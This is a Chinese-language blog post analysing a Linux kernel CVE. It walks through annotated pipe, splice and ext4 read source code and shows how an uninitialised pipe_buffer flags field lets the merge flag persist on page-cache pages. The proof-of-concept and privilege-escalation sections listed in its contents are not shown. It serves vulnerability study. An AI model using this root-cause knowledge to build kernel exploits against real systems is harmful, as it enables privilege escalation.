编辑
2023-06-01
CVE
00
请注意,本文编写于 673 天前,最后修改于 647 天前,其中某些信息可能已经过时。

目录

0x00 相关知识解析
PIPE
Splice
0x01 相关结构体解析
pipe_buffer
pipe_inode_info
iov_iter
0x02 相关函数解析
管道创建
pipe()
__do_pipe_flags()
create_pipe_files()
get_pipe_inode()
alloc_pipe_info()
管道读
pipe_read()
copy_page_to_iter()
copy_page_to_iter_pipe()
copy_to_iter()
copy_pipe_to_iter()
push_pipe()
管道写
pipe_write()
Splice
do_splice()
do_splice_to()
splice_read()
generic_file_splice_read()
call_read_iter()
read_iter()
ext4_file_read_iter()
generic_file_read_iter()
generic_file_buffered_read()
0x03 漏洞分析
0x04 漏洞利用
POC
提权

这调用链 麻了

0x00 相关知识解析


PIPE

众所周知 在Linux中 近乎所有东西都是以文件的形式存在的 管道也不例外 在Linux内核中 管道本质上是创建了一个虚拟的inode结点 在节点上存放数据的是pipe_inode_info结构体

当创建一个管道时 内核会创建一个VFS inode 一个pipe_inode_info结构体 两个文件描述符(表示管道的两端) 一个pipe_buffer结构体数组

Splice

对于文件之间的copy 最直接的方法就是直接打开两个文件 然后对着copy就好了 当然一般直接的方法都比较烂.. 这样做虽然简单 但是会带来大量的系统开销 因为需要频繁地将数据从内核态拷贝到用户态 然后再将数据从用户态拷贝回内核态 来回进行数据拷贝

因此为了减少这样的系统开销所以诞生了splice 其作用是在两个文件描述符之间进行copy 但是这个拷贝过程是不经过用户态的 其本质是利用管道在内核空间中进行数据拷贝

当数据想要从一个文件描述符拷贝到另一个文件描述符中时 只需要先创建一个管道 之后使用splice将数据从源文件描述符拷贝到管道中 然后再调用splice将数据从管道拷贝到目的文件描述符中即可 这样所有数据的拷贝都在内核空间完成

0x01 相关结构体解析


pipe_buffer
c
// include/linux/pipe_fs_i.h /* pipe_buffer结构体存放着实际管道中存放的数据 */ // flags #define PIPE_DEF_BUFFERS 16 #define PIPE_BUF_FLAG_LRU 0x01 /* page is on the LRU */ #define PIPE_BUF_FLAG_ATOMIC 0x02 /* was atomically mapped */ #define PIPE_BUF_FLAG_GIFT 0x04 /* page is a gift */ #define PIPE_BUF_FLAG_PACKET 0x08 /* read() as a packet */ #define PIPE_BUF_FLAG_CAN_MERGE 0x10 /* can merge buffers */ #define PIPE_BUF_FLAG_WHOLE 0x20 /* read() must return entire buffer or error */ #ifdef CONFIG_WATCH_QUEUE #define PIPE_BUF_FLAG_LOSS 0x40 /* Message loss happened after this buffer */ #endif /** * struct pipe_buffer - a linux kernel pipe buffer * @page: the page containing the data for the pipe buffer * @offset: offset of data inside the @page * @len: length of data inside the @page * @ops: operations associated with this buffer. See @pipe_buf_operations. * @flags: pipe buffer flags. See above. * @private: private data owned by the ops. **/ struct pipe_buffer { struct page *page; // 当前pipe_buffer所对应的page unsigned int offset, len; // 数据在页中的偏移,长度 const struct pipe_buf_operations *ops; // 与该缓冲区相关联的操作 与本文无关 unsigned int flags; // flags unsigned long private; // 属于关联操作的私有data };
pipe_inode_info
c
// include/linux/pipe_fs_i.h /** * struct pipe_inode_info - a linux kernel pipe * @mutex: mutex protecting the whole thing * @rd_wait: reader wait point in case of empty pipe * @wr_wait: writer wait point in case of full pipe * @head: The point of buffer production * @tail: The point of buffer consumption * @note_loss: The next read() should insert a data-lost message * @max_usage: The maximum number of slots that may be used in the ring * @ring_size: total number of buffers (should be a power of 2) * @nr_accounted: The amount this pipe accounts for in user->pipe_bufs * @tmp_page: cached released page * @readers: number of current readers of this pipe * @writers: number of current writers of this pipe * @files: number of struct file referring this pipe (protected by ->i_lock) * @r_counter: reader counter * @w_counter: writer counter * @fasync_readers: reader side fasync * @fasync_writers: writer side fasync * @bufs: the circular array of pipe buffers * @user: the user who created this pipe * @watch_queue: If this pipe is a watch_queue, this is the stuff for that **/ struct pipe_inode_info { struct mutex mutex; // 信号量 保证互斥操作 wait_queue_head_t rd_wait, wr_wait; // 等待读取的队列 等待写入的队列 有点类似生产者问题 因为管道空而不能读 因为管道满而不能写 unsigned int head; // 管道的起始指针 unsigned int tail; // 管道的结束指针 unsigned int max_usage; // 最大可用pipe_buffer数量 unsigned int ring_size; // 当前已分配的pipe_buffer个数 #ifdef CONFIG_WATCH_QUEUE bool note_loss; #endif unsigned int nr_accounted; unsigned int readers; // 当前管道的读者数量 unsigned int writers; // 当前管道的写者数量 unsigned int files; // unsigned int r_counter; unsigned int w_counter; struct page *tmp_page; struct fasync_struct *fasync_readers; struct fasync_struct *fasync_writers; struct pipe_buffer *bufs; // 存放多个pipe_buffer的数组 struct user_struct *user; #ifdef CONFIG_WATCH_QUEUE struct watch_queue *watch_queue; #endif };
iov_iter
c
// include/linux/uio.h /* iov_iter结构体用于迭代被分为多个页的数据 -> 用于迭代一个个页面 */ enum iter_type { /* iter types */ ITER_IOVEC = 4, ITER_KVEC = 8, ITER_BVEC = 16, ITER_PIPE = 32, // 当前迭代的数据为某个pipe中的数据 ITER_DISCARD = 64, // 写入当前iov_iter的数据全部丢弃 }; struct iov_iter { /* * Bit 0 is the read/write bit, set if we're writing. * Bit 1 is the BVEC_FLAG_NO_REF bit, set if type is a bvec and * the caller isn't expecting to drop a page reference when done. */ unsigned int type; // 当前迭代的数据来自于什么结构 size_t iov_offset; // 当前迭代到page的相对偏移 读写将从该page的这个相对偏移开始 size_t count; // 可读写数组字节大小 union { const struct iovec *iov; const struct kvec *kvec; const struct bio_vec *bvec; struct pipe_inode_info *pipe; }; union { unsigned long nr_segs; struct { unsigned int head; unsigned int start_head; }; }; };

0x02 相关函数解析


管道创建

pipe()

创建管道使用的是pipe()系统调用 但是实际上在Kernel层面调用的是do_pipe2()

c
// fs/pipe.c static int do_pipe2(int __user *fildes, int flags) { struct file *files[2]; int fd[2]; int error; error = __do_pipe_flags(fd, files, flags); if (!error) { if (unlikely(copy_to_user(fildes, fd, sizeof(fd)))) { fput(files[0]); fput(files[1]); put_unused_fd(fd[0]); put_unused_fd(fd[1]); error = -EFAULT; } else { fd_install(fd[0], files[0]); fd_install(fd[1], files[1]); } } return error; }

可以看到实际上调用的是__do_pipe_flags()

__do_pipe_flags()
c
static int __do_pipe_flags(int *fd, struct file **files, int flags) { int error; int fdw, fdr; if (flags & ~(O_CLOEXEC | O_NONBLOCK | O_DIRECT | O_NOTIFICATION_PIPE)) return -EINVAL; error = create_pipe_files(files, flags); if (error) return error; error = get_unused_fd_flags(flags); ... }
create_pipe_files()
c
int create_pipe_files(struct file **res, int flags) { struct inode *inode = get_pipe_inode(); struct file *f; int error; if (!inode) return -ENFILE; ... }
get_pipe_inode()
c
static struct inode * get_pipe_inode(void) { struct inode *inode = new_inode_pseudo(pipe_mnt->mnt_sb); struct pipe_inode_info *pipe; if (!inode) goto fail_inode; inode->i_ino = get_next_ino(); pipe = alloc_pipe_info(); if (!pipe) goto fail_iput; ... }
alloc_pipe_info()
c
struct pipe_inode_info *alloc_pipe_info(void) { struct pipe_inode_info *pipe; unsigned long pipe_bufs = PIPE_DEF_BUFFERS; struct user_struct *user = get_current_user(); unsigned long user_bufs; unsigned int max_size = READ_ONCE(pipe_max_size); pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT); if (pipe == NULL) goto out_free_uid; ... pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer), GFP_KERNEL_ACCOUNT); if (pipe->bufs) { init_waitqueue_head(&pipe->rd_wait); init_waitqueue_head(&pipe->wr_wait); pipe->r_counter = pipe->w_counter = 1; pipe->max_usage = pipe_bufs; pipe->ring_size = pipe_bufs; pipe->nr_accounted = pipe_bufs; pipe->user = user; mutex_init(&pipe->mutex); return pipe; } ... }

可以看到最终先调用了kzalloc()分配了一个pipe_inode_info结构体 然后调用kcalloc()分配了PIPE_DEF_BUFFERS(16)个pipe_buffer 并挂载到pipe_inode_info->bufs上

至此 pipe的创建流程已经走完 调用链为pipe() -> do_pipe2() -> __do_pipe_flags() -> create_pipe_files() -> get_pipe_inode() -> alloc_pipe_info()

管道读

在同文件中有一个file_operations函数表 可以看到对于pipe的读操作是调用pipe_read()实现的

c
/*
 * file_operations table for pipes/FIFOs as quoted by the article.
 * The two entries analysed in the text are .read_iter (pipe_read) and
 * .write_iter (pipe_write).
 */
const struct file_operations pipefifo_fops = {
	.open = fifo_open,
	.llseek = no_llseek,
	.read_iter = pipe_read,
	.write_iter = pipe_write,
	.poll = pipe_poll,
	.unlocked_ioctl = pipe_ioctl,
	.release = pipe_release,
	.fasync = pipe_fasync,
	.splice_write = iter_file_splice_write,
};
pipe_read()

相关函数定义为

c
// fs/pipe.c static ssize_t pipe_read(struct kiocb *iocb, struct iov_iter *to)

其中两个参数

  • iocb: I/O控制块 通过iocb->ki_filp->private_data可以取到当前管道的pipe_inode_info结构体指针
  • to: 从管道中读出的数据将要存放到哪里

首先是调用iov_iter_count(to)来获取读取的字节数 并且从iocb中获取到pipe_inode_info结构体 如果读取的字节数为0 则直接退出

c
size_t total_len = iov_iter_count(to); struct file *filp = iocb->ki_filp; struct pipe_inode_info *pipe = filp->private_data; bool was_full, wake_next_reader = false; ssize_t ret; /* Null read succeeds. */ if (unlikely(total_len == 0)) return 0; ret = 0; __pipe_lock(pipe);

然后判断管道是否已满 如果pipe->head - pipe->tail >= pipe->max_usage则管道已满

c
was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage);

接下来就是循环读 将pipe中的内容读到to所描述的目标缓冲区中

c
for (;;) { unsigned int head = pipe->head; unsigned int tail = pipe->tail; unsigned int mask = pipe->ring_size - 1; if (!pipe_empty(head, tail)) { struct pipe_buffer *buf = &pipe->bufs[tail & mask]; size_t chars = buf->len; size_t written; int error; if (chars > total_len) { if (buf->flags & PIPE_BUF_FLAG_WHOLE) { if (ret == 0) ret = -ENOBUFS; break; } chars = total_len; } error = pipe_buf_confirm(pipe, buf); if (error) { if (!ret) ret = error; break; } written = copy_page_to_iter(buf->page, buf->offset, chars, to); if (unlikely(written < chars)) { if (!ret) ret = -EFAULT; break; } ret += chars; buf->offset += chars; buf->len -= chars; /* Was it a packet buffer? Clean up and exit */ if (buf->flags & PIPE_BUF_FLAG_PACKET) { total_len = chars; buf->len = 0; } if (!buf->len) { pipe_buf_release(pipe, buf); spin_lock_irq(&pipe->rd_wait.lock); tail++; pipe->tail = tail; spin_unlock_irq(&pipe->rd_wait.lock); } total_len -= chars; if (!total_len) break; /* common path: read succeeded */ if (!pipe_empty(head, tail)) /* More to do? */ continue; } if (!pipe->writers) break; if (ret) break; if (filp->f_flags & O_NONBLOCK) { ret = -EAGAIN; break; } __pipe_unlock(pipe); /* * We only get here if we didn't actually read anything. * * However, we could have seen (and removed) a zero-sized * pipe buffer, and might have made space in the buffers * that way. * * You can't make zero-sized pipe buffers by doing an empty * write (not even in packet mode), but they can happen if * the writer gets an EFAULT when trying to fill a buffer * that already got allocated and inserted in the buffer * array. * * So we still need to wake up any pending writers in the * _very_ unlikely case that the pipe was full, but we got * no data. 
*/ if (unlikely(was_full)) { wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } /* * But because we didn't read anything, at this point we can * just return directly with -ERESTARTSYS if we're interrupted, * since we've done any required wakeups and there's no need * to mark anything accessed. And we've dropped the lock. */ if (wait_event_interruptible_exclusive(pipe->rd_wait, pipe_readable(pipe)) < 0) return -ERESTARTSYS; __pipe_lock(pipe); was_full = pipe_full(pipe->head, pipe->tail, pipe->max_usage); wake_next_reader = true; }

最后做一些判断 然后返回读入字节数

c
if (was_full) { wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM); kill_fasync(&pipe->fasync_writers, SIGIO, POLL_OUT); } if (wake_next_reader) wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM); if (ret > 0) file_accessed(filp); return ret;
copy_page_to_iter()

还是先来看下函数定义

c
// lib/iov_iter.c size_t copy_page_to_iter(struct page *page, size_t offset, size_t bytes, struct iov_iter *i)
  • page: 源页面
  • offset: 数据在页面中的偏移
  • bytes: 读取的字节数
  • i: 目的地址(iov_iter)

整体函数实现非常短 根据不同的iov_iter类型 执行不同的copy方式 这里我们主要关注的是pipe的copy方式

c
if (unlikely(!page_copy_sane(page, offset, bytes))) return 0; if (i->type & (ITER_BVEC|ITER_KVEC)) { void *kaddr = kmap_atomic(page); size_t wanted = copy_to_iter(kaddr + offset, bytes, i); kunmap_atomic(kaddr); return wanted; } else if (unlikely(iov_iter_is_discard(i))) return bytes; else if (likely(!iov_iter_is_pipe(i))) return copy_page_to_iter_iovec(page, offset, bytes, i); else return copy_page_to_iter_pipe(page, offset, bytes, i);
copy_page_to_iter_pipe()

整体实现也很短而且好理解

c
/*
 * Pipe-destination branch of copy_page_to_iter().
 *
 * Instead of copying bytes, this makes a pipe_buffer slot reference @page
 * directly, or extends the current slot when the new range continues it.
 * Returns the number of bytes accounted for, or 0 when @bytes is zero,
 * sanity() fails or the pipe is full.
 */
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe; // pipe_inode_info behind this iterator
	struct pipe_buffer *buf; // slot that will describe the data
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;

	if (unlikely(bytes > i->count)) // clamp the request to the byte count left in the iterator
		bytes = i->count;

	if (unlikely(!bytes))
		return 0;

	if (!sanity(i))
		return 0;

	off = i->iov_offset; // offset at which the next write would land
	buf = &pipe->bufs[i_head & p_mask]; // current slot in the ring
	if (off) {
		if (offset == off && buf->page == page) { // same page and same position as the current slot
			/* merge with the last one */
			buf->len += bytes;
			i->iov_offset += bytes;
			goto out;
		}
		i_head++;
		buf = &pipe->bufs[i_head & p_mask];
	}
	if (pipe_full(i_head, p_tail, pipe->max_usage)) // pipe is full: return without adding anything
		return 0;

	/* ops, page, offset and len are assigned below; buf->flags is not assigned anywhere in this function. */
	buf->ops = &page_cache_pipe_buf_ops;
	get_page(page); // take an extra reference on the page
	buf->page = page; // reference the page directly rather than copying it
	buf->offset = offset;
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

很显然 对于接收方来说 复制就是直接引用需要复制的页面 并且记录页面的offset len等数据 这样做的好处是降低了性能开销 毕竟io是需要时间的 但是赋值近乎不需要

当然因为这里接收方是直接引用的其他页面 所以必须保证在写入的时候不会将数据写入到这种页面中 另外我们可以发现在page复制到pipe_buffer中时 几乎所有的pipe_buffer相关的字段都被重新赋值了 除了flags

copy_to_iter()

对于pipe的数据传递 除了pipe_read() -> copy_page_to_iter() -> copy_page_to_iter_pipe()的调用链之外 copy_to_iter()也可以实现类似的功能

c
// include/linux/uio.h size_t copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i) { if (unlikely(!check_copy_size(addr, bytes, true))) return 0; else return _copy_to_iter(addr, bytes, i); }
c
// lib/iov_iter.c /* addr: 源地址 bytes: 复制字节数 i: iov_iter指针 */ size_t _copy_to_iter(const void *addr, size_t bytes, struct iov_iter *i) { const char *from = addr; if (unlikely(iov_iter_is_pipe(i))) return copy_pipe_to_iter(addr, bytes, i); if (iter_is_iovec(i)) might_fault(); iterate_and_advance(i, bytes, v, copyout(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len), memcpy_to_page(v.bv_page, v.bv_offset, (from += v.bv_len) - v.bv_len, v.bv_len), memcpy(v.iov_base, (from += v.iov_len) - v.iov_len, v.iov_len) ) return bytes; }

当然 可以发现最后针对pipe类型还是调用的copy_pipe_to_iter() 所以针对pipe的数据传递还有一条调用链为copy_to_iter() -> _copy_to_iter() -> copy_pipe_to_iter()

copy_pipe_to_iter()
c
// lib/iov_iter.c static size_t copy_pipe_to_iter(const void *addr, size_t bytes, struct iov_iter *i) { struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体 unsigned int p_mask = pipe->ring_size - 1; unsigned int i_head; size_t n, off; if (!sanity(i)) return 0; // 下文详解 bytes = n = push_pipe(i, bytes, &i_head, &off); if (unlikely(!n)) return 0; do { size_t chunk = min_t(size_t, n, PAGE_SIZE - off); memcpy_to_page(pipe->bufs[i_head & p_mask].page, off, addr, chunk); // 直接copy i->head = i_head; i->iov_offset = off + chunk; n -= chunk; addr += chunk; off = 0; i_head++; } while (n); i->count -= bytes; // 修改当前iov_iter待写入的大小 return bytes; }
push_pipe()
c
// lib/iov_iter.c static size_t push_pipe(struct iov_iter *i, size_t size, int *iter_headp, size_t *offp) { struct pipe_inode_info *pipe = i->pipe; // 获取pipe_inode_info结构体 unsigned int p_tail = pipe->tail; unsigned int p_mask = pipe->ring_size - 1; unsigned int iter_head; size_t off; ssize_t left; // check if (unlikely(size > i->count)) size = i->count; if (unlikely(!size)) return 0; left = size; data_start(i, &iter_head, &off); // 获取pipe的head和起始offset *iter_headp = iter_head; *offp = off; // 如果是从页面中间的位置开始写 if (off) { left -= PAGE_SIZE - off; // left - (PAGE_SIZE - off) 判断剩余位置是否够写 if (left <= 0) { pipe->bufs[iter_head & p_mask].len += size; // 如果够写就返回 return size; } pipe->bufs[iter_head & p_mask].len = PAGE_SIZE; // 如果不够就扩充到PAGE_SIZE iter_head++; } // 循环扩充pipe_buffer while (!pipe_full(iter_head, p_tail, pipe->max_usage)) { struct pipe_buffer *buf = &pipe->bufs[iter_head & p_mask]; // 获取pipe_buffer struct page *page = alloc_page(GFP_USER); if (!page) break; // 对于pipe_buffer的属性进行初始化 buf->ops = &default_pipe_buf_ops; buf->page = page; buf->offset = 0; buf->len = min_t(ssize_t, left, PAGE_SIZE); left -= buf->len; iter_head++; pipe->head = iter_head; if (left == 0) return size; } return size - left; }

注意 此处当Kernel循环扩充pipe_buffer时跟copy_page_to_iter_pipe()一样 漏掉了pipe_buffer的flags字段

管道写

根据pipefifo_fops得知 对于管道的写操作是调用pipe_write实现的

c
/*
 * file_operations table for pipes/FIFOs as quoted by the article.
 * Writes to a pipe are dispatched through .write_iter, i.e. pipe_write.
 */
const struct file_operations pipefifo_fops = {
	.open = fifo_open,
	.llseek = no_llseek,
	.read_iter = pipe_read,
	.write_iter = pipe_write,
	.poll = pipe_poll,
	.unlocked_ioctl = pipe_ioctl,
	.release = pipe_release,
	.fasync = pipe_fasync,
	.splice_write = iter_file_splice_write,
};
pipe_write()
c
// fs/pipe.c
/*
 * .write_iter handler for pipes: copy the data described by @from into the
 * pipe reached through @iocb->ki_filp->private_data.
 *
 * First tries to append the sub-page remainder of the write to the most
 * recently used buffer when that buffer carries PIPE_BUF_FLAG_CAN_MERGE,
 * then writes the rest into fresh slots, waiting for space when the pipe is
 * full. Returns the number of bytes written or a negative error code.
 */
static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	/* Null write succeeds. */
	if (unlikely(total_len == 0))
		return 0;

	__pipe_lock(pipe);

	// bail out with SIGPIPE / -EPIPE if the pipe has no readers
	if (!pipe->readers) {
		send_sig(SIGPIPE, current, 0);
		ret = -EPIPE;
		goto out;
	}

#ifdef CONFIG_WATCH_QUEUE
	if (pipe->watch_queue) {
		ret = -EXDEV;
		goto out;
	}
#endif

	/*
	 * Only wake up if the pipe started out empty, since otherwise there
	 * should be no readers waiting.
	 * If it wasn't empty we try to merge new data into the last buffer.
	 * That naturally merges small writes, and it also page-aligns the
	 * rest of the data for large writes spanning multiple pages.
	 *
	 * In plain terms: prefer appending to a page that is not yet full, and
	 * only open a new page when appending is not allowed.
	 */
	head = pipe->head; // current head of the ring
	was_empty = pipe_empty(head, pipe->tail);
	chars = total_len & (PAGE_SIZE-1);
	// the write has a sub-page remainder (chars != 0) and the pipe was not empty
	if (chars && !was_empty) {
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask]; // most recently used pipe_buffer
		int offset = buf->offset + buf->len;

		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) && // previous buffer is mergeable and the data still fits within PAGE_SIZE: write straight into its page
		    offset + chars <= PAGE_SIZE) {
			ret = pipe_buf_confirm(pipe, buf);
			if (ret)
				goto out;

			ret = copy_page_from_iter(buf->page, offset, chars, from);
			if (unlikely(ret < chars)) {
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret;
			if (!iov_iter_count(from))
				goto out;
		}
	}

	// write the remaining data
	for (;;) {
		if (!pipe->readers) { // no readers: stop immediately
			send_sig(SIGPIPE, current, 0);
			if (!ret)
				ret = -EPIPE;
			break;
		}

		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) { // pipe not full: normal write path
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page;
			int copied;

			if (!page) { // no cached tmp_page available: allocate one
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			/*
			 * Reserve a slot in the ring in advance and attach an
			 * empty buffer. If we fault or otherwise fail to use
			 * it, the reader will consume it.
			 */
			spin_lock_irq(&pipe->rd_wait.lock);

			head = pipe->head;
			if (pipe_full(head, pipe->tail, pipe->max_usage)) { // pipe became full: go round the loop again
				spin_unlock_irq(&pipe->rd_wait.lock);
				continue;
			}

			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp)) // set the buffer flags; per the article is_packetized() reflects O_DIRECT in filp->f_flags (its body is not shown here)
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE;
			pipe->tmp_page = NULL;

			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from); // copy the data into the page
			if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
				if (!ret)
					ret = -EFAULT;
				break;
			}
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			if (!iov_iter_count(from)) // everything has been written
				break;
		}

		if (!pipe_full(head, pipe->tail, pipe->max_usage))
			continue;

		// wait for buffer space to become available
		if (filp->f_flags & O_NONBLOCK) {
			if (!ret)
				ret = -EAGAIN;
			break;
		}
		if (signal_pending(current)) {
			if (!ret)
				ret = -ERESTARTSYS;
			break;
		}

		// drop the pipe lock, wake readers if the pipe was empty, sleep until writable, then re-take the lock
		__pipe_unlock(pipe);
		if (was_empty) {
			wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
			kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
		}
		wait_event_interruptible_exclusive(pipe->wr_wait, pipe_writable(pipe));
		__pipe_lock(pipe);
		was_empty = pipe_empty(pipe->head, pipe->tail);
		wake_next_writer = true;
	}
out:
	if (pipe_full(pipe->head, pipe->tail, pipe->max_usage))
		wake_next_writer = false;
	__pipe_unlock(pipe);

	if (was_empty) {
		wake_up_interruptible_sync_poll(&pipe->rd_wait, EPOLLIN | EPOLLRDNORM);
		kill_fasync(&pipe->fasync_readers, SIGIO, POLL_IN);
	}
	if (wake_next_writer)
		wake_up_interruptible_sync_poll(&pipe->wr_wait, EPOLLOUT | EPOLLWRNORM);
	if (ret > 0 && sb_start_write_trylock(file_inode(filp)->i_sb)) {
		int err = file_update_time(filp);
		if (err)
			ret = err;
		sb_end_write(file_inode(filp)->i_sb);
	}
	return ret;
}

Splice

和pipe()差不多 虽然在常规状态下调用splice使用的是splice()系统调用 但是其背后实现是内核中的do_splice()

c
#include <fcntl.h> ssize_t splice(int fd_in, loff_t *off_in, int fd_out, loff_t *off_out, size_t len, unsigned int flags);
do_splice()

这里会进行分辨 是pipe2pipe拷贝 pipe2file拷贝还是file2pipe拷贝或者是file2file拷贝 然后流入不同的函数 这里我们重点关注file2pipe

c
// fs/splice.c long do_splice(struct file *in, loff_t *off_in, struct file *out, loff_t *off_out, size_t len, unsigned int flags) { struct pipe_inode_info *ipipe; struct pipe_inode_info *opipe; loff_t offset; long ret; // 读写权限判断 if (unlikely(!(in->f_mode & FMODE_READ) || !(out->f_mode & FMODE_WRITE))) return -EBADF; // 从file中获取到pipe_inode_info结构体 ipipe = get_pipe_info(in, true); opipe = get_pipe_info(out, true); if (ipipe && opipe) { // pipe to pipe ... return splice_pipe_to_pipe(ipipe, opipe, len, flags); } if (ipipe) { // pipe to file ... ret = do_splice_from(ipipe, out, &offset, len, flags); ... return ret; } if (opipe) { // file to pipe // pipe和文件校验 if (off_out) return -ESPIPE; if (off_in) { if (!(in->f_mode & FMODE_PREAD)) return -EINVAL; offset = *off_in; } else { offset = in->f_pos; } if (out->f_flags & O_NONBLOCK) flags |= SPLICE_F_NONBLOCK; pipe_lock(opipe); // 等待pipe空位 ret = wait_for_space(opipe, flags); if (!ret) { unsigned int p_space; // 获取传递数据大小 /* Don't try to read more the pipe has space for. */ p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail); len = min_t(size_t, len, p_space << PAGE_SHIFT); // 下文详解 ret = do_splice_to(in, &offset, opipe, len, flags); } pipe_unlock(opipe); if (ret > 0) wakeup_pipe_readers(opipe); if (!off_in) in->f_pos = offset; else *off_in = offset; return ret; } return -EINVAL; }
do_splice_to()

整体流程还是比较短 其实大部分都是在做数据校验 然后根据文件类型调用对应文件类型的函数调用表中的splice_read()

c
// fs/splice.c static long do_splice_to(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { int ret; if (unlikely(!(in->f_mode & FMODE_READ))) return -EBADF; ret = rw_verify_area(READ, in, ppos, len); if (unlikely(ret < 0)) return ret; if (unlikely(len > MAX_RW_COUNT)) len = MAX_RW_COUNT; if (unlikely(!in->f_op->splice_read)) return warn_unsupported(in, "read"); return in->f_op->splice_read(in, ppos, pipe, len, flags); }
splice_read()

这里以最常见的ext4文件类型举例 可以查询到对应的函数调用表 可以看到最后是调用了generic_file_splice_read()

c
// fs/ext4/file.c const struct file_operations ext4_file_operations = { .llseek = ext4_llseek, .read_iter = ext4_file_read_iter, .write_iter = ext4_file_write_iter, .iopoll = iomap_dio_iopoll, .unlocked_ioctl = ext4_ioctl, .mmap = ext4_file_mmap, .mmap_supported_flags = MAP_SYNC, .open = ext4_file_open, .release = ext4_release_file, .fsync = ext4_sync_file, .get_unmapped_area = thp_get_unmapped_area, .splice_read = generic_file_splice_read, .splice_write = iter_file_splice_write, .fallocate = ext4_fallocate, };
generic_file_splice_read()

可以看到该函数还是进行一些基础操作 创建结构体什么的 然后调用call_read_iter()进行操作

c
// fs/splice.c ssize_t generic_file_splice_read(struct file *in, loff_t *ppos, struct pipe_inode_info *pipe, size_t len, unsigned int flags) { struct iov_iter to; struct kiocb kiocb; unsigned int i_head; int ret; iov_iter_pipe(&to, READ, pipe, len); // 根据pipe创建iov_iter结构体 i_head = to.head; init_sync_kiocb(&kiocb, in); // 创建kiocb结构体 kiocb.ki_pos = *ppos; ret = call_read_iter(in, &kiocb, &to); // 下文详解 if (ret > 0) { // 正常传输 *ppos = kiocb.ki_pos; file_accessed(in); // 更新状态 } else if (ret < 0) { // 传输失败 to.head = i_head; to.iov_offset = 0; iov_iter_advance(&to, 0); /* to free what was emitted */ /* * callers of ->splice_read() expect -EAGAIN on * "can't put anything in there", rather than -EFAULT. */ if (ret == -EFAULT) ret = -EAGAIN; } return ret; }
call_read_iter()

最后又是调用对应文件类型的read_iter

c
// include/linux/fs.h static inline ssize_t call_read_iter(struct file *file, struct kiocb *kio, struct iov_iter *iter) { return file->f_op->read_iter(kio, iter); }
read_iter()

根据之前的函数调用表可以看到read_iter()调用的是ext4_file_read_iter()

c
// fs/ext4/file.c const struct file_operations ext4_file_operations = { .llseek = ext4_llseek, .read_iter = ext4_file_read_iter, .write_iter = ext4_file_write_iter, .iopoll = iomap_dio_iopoll, .unlocked_ioctl = ext4_ioctl, .mmap = ext4_file_mmap, .mmap_supported_flags = MAP_SYNC, .open = ext4_file_open, .release = ext4_release_file, .fsync = ext4_sync_file, .get_unmapped_area = thp_get_unmapped_area, .splice_read = generic_file_splice_read, .splice_write = iter_file_splice_write, .fallocate = ext4_fallocate, };
ext4_file_read_iter()
c
// fs/ext4/file.c static ssize_t ext4_file_read_iter(struct kiocb *iocb, struct iov_iter *to) { struct inode *inode = file_inode(iocb->ki_filp); if (unlikely(ext4_forced_shutdown(EXT4_SB(inode->i_sb)))) return -EIO; if (!iov_iter_count(to)) return 0; /* skip atime */ if (iocb->ki_flags & IOCB_DIRECT) return ext4_dio_read_iter(iocb, to); // 没设置IOCB_DIRECT流入这里 return generic_file_read_iter(iocb, to); }
generic_file_read_iter()
c
// mm/filemap.c ssize_t generic_file_read_iter(struct kiocb *iocb, struct iov_iter *iter) { size_t count = iov_iter_count(iter); ssize_t retval = 0; ... retval = generic_file_buffered_read(iocb, iter, retval); out: return retval; }
generic_file_buffered_read()

代码量太大了 简单讲下功能吧

c
